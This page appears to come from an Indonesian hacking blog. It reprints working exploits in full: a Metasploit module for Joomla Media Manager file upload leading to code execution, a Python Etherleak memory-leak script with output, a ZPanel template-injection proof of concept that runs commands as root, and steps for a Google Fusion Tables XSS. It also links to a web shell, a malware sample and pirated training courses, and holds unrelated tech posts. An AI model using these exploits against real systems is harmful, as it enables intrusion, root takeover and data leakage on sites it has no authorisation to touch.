Pages

15 August 2013

[Metasploit] Joomla Media Manager File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::FileDropper

 def initialize(info={})
 super(update_info(info,
 'Name' => "Joomla Media Manager File Upload Vulnerability",
 'Description' => %q{
 This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
 which comes by default in Joomla, allowing arbitrary file uploads, and results in
 arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
 Manager, you will need to supply a valid username and password (Editor role or
 higher) in order to work properly.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
 'juan vazquez' # Metasploit module
 ],
 'References' =>
 [
 [ 'OSVDB', '95933' ],
 [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
 [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
 [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
 [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
 ],
 'Payload' =>
 {
 'DisableNops' => true,
 # Arbitrary big number. The payload gets sent as POST data, so
 # really it's unlimited
 'Space' => 262144, # 256k
 },
 'Platform' => ['php'],
 'Arch' => ARCH_PHP,
 'Targets' =>
 [
 [ 'Joomla 2.5.x <=2.5.13', {} ]
 ],
 'Privileged' => false,
 'DisclosureDate' => "Aug 01 2013",
 'DefaultTarget' => 0))

 register_options(
 [
 OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
 OptString.new('USERNAME', [false, 'User to login with', '']),
 OptString.new('PASSWORD', [false, 'Password to login with', '']),
 ], self.class)

 end

 def peer
 return "#{rhost}:#{rport}"
 end

 def check
 res = get_upload_form

 if res and res.code == 200
 if res.body =~ /You are not authorised to view this resource/
 print_status("#{peer} - Joomla Media Manager Found but authentication required")
 return Exploit::CheckCode::Detected
 elsif res.body =~ /
'POST', 'uri' => "#{u.path}?#{u.query}", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'cookie' => @cookies, 'vars_get' => { 'asset' => 'com_content', 'author' => '', 'format' => '', 'view' => 'images', 'folder' => '' }, 'data' => post_data }) return res end def get_upload_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php"), 'cookie' => @cookies, 'encode_params' => false, 'vars_get' => { 'option' => 'com_media', 'view' => 'images', 'tmpl' => 'component', 'e_name' => 'jform_articletext', 'asset' => 'com_content', 'author' => '' } }) return res end def get_login_form res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'view' => 'login' } }) return res end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"), 'cookie' => @cookies, 'vars_get' => { 'task' => 'user.login' }, 'vars_post' => { 'username' => @username, 'password' => @password }.merge(@login_options) }) return res end def parse_login_options(html) html.scan(//) {|option| @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1" } end def exploit @login_options = {} @cookies = "" @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php" @username = datastore['USERNAME'] @password = datastore['PASSWORD'] print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") print_status("#{peer} - Accessing the Login Form...") res = get_login_form if res.nil? or res.code != 200 or res.body !~ /login/ fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form") end parse_login_options(res.body) res = login if not res or res.code != 303 fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ / 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), }) end end
Baca Selengkapnya... [Metasploit] Joomla Media Manager File Upload Vulnerability

12 June 2013

Cisco ASA Ethernet Information Leak

#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads
# ethernet frames with data which vary from one packet to another,
# likely taken from kernel memory, system memory allocated to
# the device driver, or a hardware buffer on its network interface
# card. Exploit uses scapy with either ICMP or ARP requests as
# this can trigger with either but ICMP can hit layer3 filtering
# rules. Using ARP the padding appears to leak only fixed constant
# values when exploited, ICMP leaks random bytes.
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|
# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|
# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|
# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|
# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|
# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|
# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|
# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+gl"...+.9|
# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
# -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
 print "!Killing"
 sys.exit(0)

def spawn(host,type):
 if type == 'arp':
 send(ARP(pdst=host),loop=1,nofilter=1)
 elif type == 'icmp':
 send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)

if __name__ == "__main__":
 print "[ CVE-2003-0001 'Etherleak' exploit"
 signal.signal(signal.SIGINT,signalhandler)
 if len(sys.argv) < 4:
 print "[ No! Use with   "
 sys.exit(1)
 type = sys.argv[2]
 if type == 'arp':
 pass
 elif type == 'icmp':
 pass
 else:
 print "Bad type!"
 sys.exit(0)
 pid = os.fork()
 if(pid):
 print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
 spawn(sys.argv[1],sys.argv[2])
 while True:
 if type == 'arp':
 myfilter = "host %s and arp" % sys.argv[1]
 elif type == 'icmp':
 myfilter = "host %s and icmp" % sys.argv[1]
 x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
 p = x[0]
 if type == 'arp':
 pad = p.getlayer(2)
 if type == 'icmp':
 pad = p.getlayer(4)
 leak = str(pad)
 hexfull = binascii.b2a_hex(leak)
 file = "%s.hex"%sys.argv[3]
 fdesc = open(file,"a")
 fdesc.write(hexfull + "
")
 fdesc.close()
 # 32 bits leaked here for me.
 if type == 'icmp':
 bytes = leak[9:13]
 elif type == 'arp':
 bytes = leak[10:14]
 fdesc = open(sys.argv[3],"ab")
 fdesc.write(bytes)
 fdesc.close()
Baca Selengkapnya... Cisco ASA Ethernet Information Leak

13 May 2013

WinRoot ver 0.1

Baca Selengkapnya... WinRoot ver 0.1

19 April 2013

ZPanel Code Execution

Hi all, There's an arbitrary (PHP) code execution in ZPanel, a free and open-source shared hosting control panel. Using the included zsudo binary, access can be escalated and commands can be run as root. The vulnerability : ZPanel uses a poor "templater" system that basically consists of a few str_replace calls and an eval... and as could be expected from something like this, it does a very poor job at preventing malicious code. The relevant code can be seen here : https://github.com/bobsta63/zpanelx/blob/master/dryden/ui/templateparser.class.php (note the poor attempt at stripping out tags). By effectively injecting the replacement that occurs in line 71, one can run arbitrary PHP code. When combined with ZPanels `zsudo` binary, one can execute arbitrary commands as root, with a maximum of 5 additional arguments (aside from the path to the to-be-executed-command). The scope: Custom templates/themes can be uploaded by resellers and administrators. This effectively means that anyone that can get access to a reseller account through any means, including by purchasing a reseller service from a ZPanel-using host, can gain root access, without detection. PoC : Insert the following code anywhere in master.ztml or any other template that is parsed by the template parser, replacing 'touch derp' with any command of choice : <& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo $value['bogus &> Strangely, login.ztml does not appear to use the templater, and seems to allow PHP execution by simply using tags (which I would consider a vulnerability in itself, but that aside). Vendor notification: I have warned the ZPanel development team about their insecure templater *months* ago, and explicitly pointed out that their "PHP code filtering" was not going to work well. I have submitted a patch for some other fixable aspects of the templater (which was merged into the main repository), but the development team insisted that the security in the templater was fine, and that it wasn't a problem, basically telling me that they were not going to change it. They have not fixed this vulnerability, nor do they appear to have any interest in doing so in the near future. How to solve it: Either remove the reseller template uploading functionality (this would impair core functionality), or use a real templating engine that does not use a few str_replace() calls strung together in front of an eval(). I'm quite new to this list, and not exactly a pentesting expert, so if I left out some important information in the above message, please do let me know. - Sven Slootweg
Baca Selengkapnya... ZPanel Code Execution

18 April 2013

Samsung Developer Competition 2013

Samsung menggelar rangkaian acara Samsung Developer Competition 2013. Sebuah acara untuk menjembatani pemain di industri mobile, ahli di bidang produk mobile dan juga para pengembang aplikasi. Tujuannya adalah agar para pengembang bisa melihat apa saja kebutuhan industri yang bisa dipenuhi dengan aplikasi mobile.

Acara kompetisi ini telah dimulai dengan rangkaian workshop dan seminar ke berbagai kampus. Untuk gelaran pertama telah dilaksanakan di Universitas Indonesia pada tanggal 2 – 4 April 2013 dan dilanjutkan ke Universitas Bina Nusantara 8 – 10 April 2013. Workshop selanjutnya akan diadakan pada tanggal 24 – 26 April 2013 di Universitas Budi Luhur. 

Ajang kompetisi aplikasi Samsung ini terbuka bagi semua kalangan pengembang aplikasi, baik yang pemula, menengah atau yang sudah profesional. Aplikasi-aplikasi yang dilombakan akan difilter melalui tiga kategori: lifestyle, health dan social. Tidak hanya itu, masing-masing kategori akan didukung oleh pemain besar di industri, seperti kategori lifestyle yang didukung Mitra Adi Perkasa (MAP), kategori health yang didukung Nutrifood dan kategori sosial yang akan didukung oleh PNPM (Program Nasional Pemberdayaan Masyarakat). 

Samsung menyiapkan 30 Paket hadiah, masing-masing uang senilai 2,5 juta rupiah dan 1 Galaxy Tab 10.1″, untuk 30 finalis (10 aplikasi terbaik di setiap kategori). Selain itu, Juara pertama juga akan mendapatkan uang tunai sebesar 25 juta rupiah dan 3 perangkat terbaru Samsung, diikuti juara kedua mendapatkan uang tunai 15 juta rupiah dan 2 perangkat terbaru samsung serta juara ketiga mendapatkan uang tunai 10 juta rupiah dan 1 perangkat terbaru Samsung.

Untuk pendaftaran kompetisi bisa menuju Tautan ini. Sedangkan informasi jadwal workshop yang akan di gelar di kota, Bandung, Surabaya, Yogyakarta dan Malang akan diumumkan kemudian. Tunggu informasi selanjutnya di Trenologi. 

Sumber :

http://techne.dailysocial.net/sdc/

http://www.trenologi.com/2013041613745/siap-siap-workshop-samsung-developer-competition-2013-digelar/
Baca Selengkapnya... Samsung Developer Competition 2013

30 March 2013

Analisa tentang Tools Adwind ( Adwind Web Fake ) yang berbentuk *.jar


Saya kurang begitu tau tentang kapan dan dimana pertama kali software ini di Release.

pertama kali saya mendengar software ini dr teman yang namanya tidak bisa saya sebutkan. Teman saya bertanya

MyFriends : man, lo udah tau belum tentang soft "Adwind Web Fake"?


Me : wew, itu tools apa kk???


MyFriends : Tools itu semacam tools untuk membuat web Fake dimana Attacker dapat memalsukan alamat website dan attacker juga bisa menambahkan beberapa 

command/perintah tertentu untuk melakukan injeksi ke pc Target yg akan melakukan klik terhadap link yg telah kita palsukan.



Me : wah toolsnya keren yah ^_^

MyFriends : Iya sih keren tp pas gw scan di virustotal.com 

https://www.virustotal.com/en/file/10f09d04b8f1ffa17cf8e04c171589700de0f79b51a36c7c653c980d656e151e/analysis/1364582104/

hasilnya malah mengandung virus semua hakhakhakhak...99x


Me : wkwowkwowkwowkwwkwkw,...yg mana sih toolsnya coba liat. gw penasaran.

MyFriends : nih linknya http://uppit.com/15iuehf89idu/adwind_web_fake.zip 

coba lu bongkar kali ajah lo nemu harta karun di dalam hakhakhakhak...99x

Me : Ibih,...boro² harta karun yg ada gw malah kena marah sm Liena -_-"

MyFriends : hakhakhakhak...99x itulah gunanya elu,...siapa lg coba yg bisa tolongin gw :D


Me : ah,...taek lo. bahasa² kayak gini nih yg paling gw benci hahahhaha :p


MyFriends : hakhakhakhakhak...99x 


Me : Ok...nanti gw kasih kabar.


Singkat cerita setelah toolsnya sudah gw download gw langsung mulai lihat² toolsnya. ternyata filenya dalam bentuk *.jar -_-
ok gw lmulai dr klik kanan -> properties => truss gw liat² apa ajah keterangan² yag ada di situ....hmmm sepertinya tidak ada yang menarik di sini.

Kayaknya gw harus pake tools kesayangan gw buat liat filenya :D 
Nama Toolsnya "FileAnalyzer" (Kalau ga tau nanti gw kasih filenya ^_^ )
setelah gw buka,...tadaaaaaaaa !!!



Oke kayaknya sudah cukup untuk liat² filenya ^_^
sekarang kita coba bongkar, seperti apa sih Algoritma dari tools Gadungan ini :p
tapi pake yah???


Kasi tau ga yah?????
kasi tau ga yah????? 
wkwowkwowkwowkwowkwkw

kita coba pake tools seadanya saja :)
gimana kalo kita coba pake 7Zip ^_^ 
Jangan bilang lo kaget waktu baca tulisan 7Zip !!! ( Ga sah kaget biasa aja lageeee :D )





Dari beberapa gambar ini kita sudah bisa memperkirakan seperti apa cara kerja tools gadungan ini :)
apalagi ada file dengan tulisan "stub.dll"  wakakkakakkkk (kalian pasti tau itu file apa ^_^ )

untuk analisa selanjutnya saya serahkan kepada kalian yang membaca Tulisan ini ^_^

Oh iya untuk gambaran tentang Tools aslinya bisa berkunjung ke sini
http://www.adwind.com.mx/index.php/en/


Semoga tulisan ini bermanfaat dan berguna buat teman² yang suka "klik link" atau download file sembarangan di internet tanpa tau itu link atau file apa :)



Saran dan Kesimpulan :

  • Link atau file apapun yang ingin kita donwload di melalui media internet, sebaiknya di cek dulu melalu web scanner link/file seperti https://www.virustotal.com/
  • Sebaiknya ubah atau ganti ekstensi file² penting yang ada di PC/Laptop/Penyimpanan Eksternal Anda dengan ekstensi yang cukup mudah untuk anda ingat. sehingga ketika PC/Laptop anda terkena virus, file² tersebut tidak akan rusak. Contoh : file dengan extensi *.Docx => *.DDDDDD atau file *.rar => *.rrr ;  terserah kalian mau pake karakter apa yang terpenting selalu beri inisial awal dr ektensi tersebut ("*.D" untuk Docx / "*.r" untuk rar).
  • Segala bentuk kejahatan yang terjadi bukan karena ada niat pelakunya, tapi karena adanya kesempatan. WASPADALAH,....WASPADALAH wkwwkwowwkowwkwowkkk =)) =))



Sampai Ketemu di Tulisan saya berikutnya (Kalau ada niat buat nulis/ngetik ) ^_^

Salam


D4wFl1N
Baca Selengkapnya... Analisa tentang Tools Adwind ( Adwind Web Fake ) yang berbentuk *.jar

10 March 2013

SyRiAn Sh3ll V7

Source Lengkap bisa diambil di sini http://pastebin.com/vsnFhkyB
Baca Selengkapnya... SyRiAn Sh3ll V7

09 March 2013

Google Fusion Tables Cross Site Scripting

# Title: Google Fusion Tables XSS (HTML Injection) Vulnerability # Release Date: 07/03/2013 # Author: Junaid Hussain - [ illSecure Research Group ] # Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com # Vulnerable Application: https://www.google.com/fusiontables/DataSource?dsrcid=implicit ------------------------------------------------------------------------------------- //##### Process: 1. go to https://www.google.com/fusiontables/DataSource?dsrcid=implicit 2. Click "Create empty table" and then click "Next" 3. Click the drop down menu on the Cards1 tab 4. Select "Change Card Layout" and then go to the Custom Tab 5. Remove the HTML code add the following code into the box:

Click here to continue

6. Click save & then Click the share button (top right) and make the link public 7. Click the drop down menu on the Cards1 tab and select the Publish Option 8. Send the Publish Link to victim. --------------------------------------------------------------------------------------- //##### Proof Of Concept: PoC: https://www.google.com/fusiontables/embedviz?viz=CARD&q=select+*+from+19VGTDJasS8NJlbbqnsiDFA_qH7Q95e2dTOKd5RU&tmplt=1&cpr=2 Video: http://www.youtube.com/watch?v=OMCJQ8Atkek&feature=youtu.be --------------------------------------------------------------------------------------- Contact: illSecResearchGroup@gmail.com - Junaid Hussain http://www.illsecure.com --------------------------------------------------------------------------------------- Original: http://www.illsecure.com/2013/03/exclusive-google-fusion-tables-xss-html.html ---------------------------------------------------------------------------------------
Baca Selengkapnya... Google Fusion Tables Cross Site Scripting

04 March 2013

Learning Whitehat Hacking and Penetration Testing 2012

Infinite Skills - Learning Whitehat Hacking and Penetration Testing 2012 | Size 1.35 GB 
SKU: 01724 | Duration: 10.5 hours - 103 lessons | Date Released: 2012-10-05
Works on: Windows PC or Mac | Format: DVD and Download | Instructor: Ric Messier


In this Ethical Hacking - Whitehat Hacking and Penetration testing training course, expert Ric Messier covers the essentials you will need to know to harden and protect your hardware and software to avoid downtime and loss of data. Protecting your networks and customer data are more important that ever, and understanding HOW you are vulnerable is the best way to learn how you can prevent attacks.

Some of the topics covered in this course are; researching and background information retrieval, networking fundamentals, a deeper look at TCP/IP and packets, as well as understanding cryptography. You will learn about scanning networks, penetration testing and the use of Metasploit, malware and viruses, DoS and DDoS attacks, web application hacking and securing wireless networks. Finally, you will learn about detection evasion and preventing programming attacks, and much more throughout this video based tutorial.

By the time you have completed this video tutorial for Whitehat Hacking and Penetration testing, you will have a deeper understanding of the areas you may be potentially be vulnerable to attack in, as well as the methods that hackers use to exploit your systems, allowing you to better understand how to secure your hardware and data from unethical hackers.


Download :

From Rapidgator

OR

From Uploaded
Part IV


SumberFHT

Baca Selengkapnya... Learning Whitehat Hacking and Penetration Testing 2012

Computer Hacking Forensic Investigator v8 (Slides)


Computer Hacking Forensic Investigator v8 (Slides) | 445 MB


File Computer Hacking Forensic Investigator v8 (Slides) :
Module 01 Computer Forensics in Todays World.pptx
Module 02 Computer Forensics Investigation Process.pptx
Module 03 Searching and Seizing Computers.pptx
Module 04 Digital Evidence.pptx
Module 05 First Responder Procedures.pptx
Module 06 Computer Forensics Lab.pptx
Module 07 Understanding Hard Disks and File Systems.pptx
Module 08 Windows Forensics.pptx
Module 09 Data Acquisition and Duplication.pptx
Module 10 Recovering Deleted Files and Deleted Partitions.pptx
Module 11 Forensics Investigation Using AccessData FTK.pptx
Module 12 Forensics Investigation Using EnCase.pptx
Module 13 Steganography and Image File Forensics.pptx
Module 14 Application Password Crackers.pptx
Module 15 Log Capturing and Event Correlation.pptx
Module 16 Network Forensics, Investigating Logs and Investigating Network Traffic.pptx
Module 17 Investigating Wireless Attacks.pptx
Module 18 Investigating Web Attacks.pptx
Module 19 Tracking Emails and Investigating Email Crimes.pptx
Module 20 Mobile Forensics.pptx
Module 21 Investigative Reports.pptx
Module 22 Becoming an Expert Witness.pptx

Donwload : 
Part I
Part II
Part III
Part IV
Part V

Sumber : Computer Hacking Forensic Investigator
Baca Selengkapnya... Computer Hacking Forensic Investigator v8 (Slides)

25 February 2013

Blackberry GSM codes

The following are codes that you can use on a BlackBerry.

Most require you to hold down the ALT key whilst typing the letters after the + sign (they don't need to be capitals).

IMEI number
Shows your device's international mobile equipment identity (IMEI - your serial number) on-screen.
Type "*#06#" (home screen or call screen.

Home Screen
ALT(left)+Shift(right)+Del - Restart the Blackberry (only for full-keyboard Blackberries)
ALT + JKVV - Display cause of PDP reject
ALT + CAP + H - Displays the Help Me screen
ALT + EACE - Displays the Help Me screen
ALT + ESCR - Displays the Help Me screen
ALT + NMLL - Switches the signal strength from bars to a numeric value.
ALT + LGLG - Displays the Java event log.

Soft reset
Performs a "soft" reset of your device;
Press-and-hold "Alt", then press-and-hold (left) "shift", then press-and-hold "Del".

Hard reset
The first step in troubleshooting a network, software or hardware error is often to perform a hard reset. With Java® based devices, this is accomplished by removing the battery, while the BlackBerry device is powered on. Hold the battery out for about 30 seconds, and replace. The BlackBerry device will reboot.

Note: A hard reset on a C++ based device is accomplished by pressing the Reset button.
Note: To perform a hard reset on a RIM models 850, 857, 950, or 957 device, insert the end of a paperclip inside the small hole on the back of the handheld.



The following should work on some version, but on the blackberry I had they didn't work.

Enterprise Activation (Options->Advanced)
ALT+CNFG - Settings for Enterprise Activation

Address Book
ALT+VALD - Validate the data structure and look for inconsistencies
ALT+RBLD - Force a data structure rebuild

from the Options menu, type the following (No ALT+ required)
RSET - Will prompt to erase & reload for a reload of the Address book from the BES
(n.b. this will wipe all entries, but you can goto SIM Phone Book & copy entries back afterwards)

Browser
ALT+RBVS - View web page source code
T - Top of page (in browser)
B - Bottom of page (in browser)
Space - Page down (in browser)
U - Switch between hide/unhide in title bar (in browser)

Calendar
Open up a Calendar item
ALT+VIEW Inside any Calendar item Show extra info for a Calendar event
(including message ID - handy for BES log troubleshooting)

from the Options menu, type the following (No ALT+ required)
SYNC - Enable Calendar slow sync
RSET - Will prompt for a reload of the calendar from the BES
RCFG - Request BES configuration
SCFG - Send device configuration
DCFG - Get CICAL configuration
SUPD - Enable detailed Cal. report for backup
SUPS - Disable detailed Cal. report for backup
SUPN - Disable Cal. report database
LUID - Enable view by UID
SRSL - Show Reminder status log

Messaging
ALT+VIEW - For messages, displays the RefId and FolderId for that particular message. For PIM items, displays only the RefId.

Search Application
ALT+ADVM Search Application Enabled Advanced Global Search

WLAN (WLAN wizard screen)
ALT-SMON WLAN - Enable simulated Wizard mode
ALT-SMOF WLAN - Disable simulated Wizard mode

Theme (from theme menu)
ALT+THMN - Change to no theme (B&W)
ALT+THMD - Change to default theme

Date/Time (Date/Time menu - No ALT+ required)
LOLO - Date/Time Show Network time values

SIM Card (Options->Advanced->SIM card - No ALT+ required)
MEPD - Display MEP info
MEP1 - Disable SIM personalization
MEP2 - Disable Network personalization
MEP3 - Disable Network subset personalization
MEP4 - Disable Service provider personalization
MEP5 - Disable Corporate personalization

Status (Options->Status)
BUYR - Data & Voice Usage
TEST - start a device test (Keyboard, GPS, RF, Audio (Handset,headset,bluetooth, Misc)

Shortcuts
A or C = phonebook
S = search
F = phone profiles
W or B = browser
H = help
K = locks the keys
L = calendar
V = messages
M = messages folder
R = alarm
T = tasks
U = calculator
I = applications
O = options
P = phone.
D = Memo pad

MYVER - Displays your devices model number and software version.
LD - Displays the local date
LT - Displays the local time
MYSIG - Displays the information you entered in the BlackBerry Options > Owner screen
MYPIN - Displays your devices PIN

Press and hold 'ALT' and left 'CAPS' key then press the 'Return' key. Brings up Language selection list, which you can scroll through and change.
Baca Selengkapnya... Blackberry GSM codes

RethinkDB (ReQL) The Next Generation NoSQL systems

Seperti dikutip dihalam webnya http://www.rethinkdb.com/ 

"RethinkDB is built to store JSON documents, and scale to multiple machines with very little effort. It has a pleasant query language that supports really useful queries like table joins and group by, and is easy to setup and learn."

ReQL merupakan Next Generasi NoSQL System Database dimana system ini berbeda dengan MongoDB dan system NoSQL Lainnya. berikut penjelasan RethinkDB mengenai perbedaan mereka dengan system database lainnya Cek Dis Aut

Web ini juga menyediakan pengenalan syntax untuk ReQL yang bisa dilihat di sini => Click Me!

Untuk lebih jelasnnya mengenai RethinkDB bisa dilihat disini 
RethinkDB
Baca Selengkapnya... RethinkDB (ReQL) The Next Generation NoSQL systems